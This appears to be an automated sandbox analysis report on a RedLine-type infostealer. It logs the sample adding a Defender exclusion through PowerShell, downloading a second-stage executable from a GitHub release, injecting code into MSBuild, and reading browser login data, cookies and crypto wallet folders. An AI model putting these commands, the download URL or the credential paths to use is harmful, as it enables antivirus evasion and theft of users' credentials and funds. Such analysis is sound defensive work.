                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444'
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444'Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F00000 protect: page execute and read and writeJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F00000 value starts with: 4D5AJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F00000Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F02000Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F4E000Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FBA000Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F02000Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F4E000Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FBA000
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: CF4008
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444'
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Process created: C:\Path1\To2\Save444\uh3ex1.exe "C:\Path1\To2\Save444\uh3ex1.exe"
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Code function: 6_2_6D597C58 cpuid 6_2_6D597C58
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Queries volume information: C:\Users\user\Desktop\9LrEuTWP8s.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Queries volume information: C:\Path1\To2\Save444\uh3ex1.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Code function: 6_2_6D5976E3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_6D5976E3
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 8184, type: MEMORYSTR
                      Source: Yara match File source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.MSBuild.exe.f00000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.uh3ex1.exe.6d5ab000.4.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.uh3ex1.exe.6d590000.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.1646379749.0000000000F02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: dump.pcap, type: PCAP
                      Source: Yara match File source: 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Electrum
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ElectronCash
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: com.liberty.jaxx
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Exodus
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Ethereum
                      Source: powershell.exe, 00000003.00000002.1475483757.0000000005904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: Yara match File source: 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 8184, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 8184, type: MEMORYSTR
                      Source: Yara match File source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.MSBuild.exe.f00000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.uh3ex1.exe.6d5ab000.4.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.uh3ex1.exe.6d590000.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.1646379749.0000000000F02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: dump.pcap, type: PCAP
                      Source: Yara match File source: 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 221 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 311 Process Injection | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | 3 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 124 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 22 Software Packing | NTDS | 441 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 241 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 241 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 311 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                      [Behavior graph: Behavior Graph ID: 1554430, Sample: 9LrEuTWP8s.exe, Startdate: 12/11/2024, Architecture: WINDOWS, Score: 100]

                      Source | Detection | Scanner | Label | Link
                      9LrEuTWP8s.exe | 47% | ReversingLabs | Win32.Ransomware.RedLine |
                      9LrEuTWP8s.exe | 100% | Joe Sandbox ML | |

                      Source | Detection | Scanner | Label | Link
                      C:\Path1\To2\Save444\uh3ex1.exe | 100% | Avira | HEUR/AGEN.1311038 |
                      C:\Users\user\AppData\Roaming\gdi32.dll | 100% | Joe Sandbox ML | |
                      C:\Path1\To2\Save444\uh3ex1.exe | 100% | Joe Sandbox ML | |
                      C:\Path1\To2\Save444\uh3ex1.exe | 68% | ReversingLabs | Win32.Trojan.Jalapeno |
                      C:\Users\user\AppData\Roaming\gdi32.dll | 83% | ReversingLabs | Win32.Trojan.Tedy |
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link
                      http://objects.githubusercontent.comd | 0% | Avira URL Cloud | safe |

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      github.com | 140.82.121.4 | true | false | | high
                      objects.githubusercontent.com | 185.199.111.133 | true | false | | high

                      Name | Malicious | Antivirus Detection | Reputation
                      https://github.com/Xavieprowel/crispy-palm-tree/releases/download/1/uh3ex1.exe | false | | high

                      Name | Source | Malicious | Antivirus Detection | Reputation
                                                          https://objects.githubusercontent.com/github-production-release-asset-2e65be/882783246/b23a0dba-ce399LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceMSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1475483757.00000000057B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://discord.com/api/v9/users/MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/faultMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsatMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://tempuri.org/example/Field1ResponseMSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://tempuri.org/example/Field1ResponseDMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name9LrEuTWP8s.exe, 00000001.00000002.1531789671.0000000003331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1473468111.0000000004751000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://api.ip.sb/ipMSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/scMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://contoso.com/Iconpowershell.exe, 00000003.00000002.1475483757.00000000057B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedMSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressingMSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://tempuri.org/example/Field3ResponseDMSBuild.exe, 00000008.00000002.1650116521.00000000030B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trustMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://objects.githubusercontent.com9LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/NonceMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsMSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
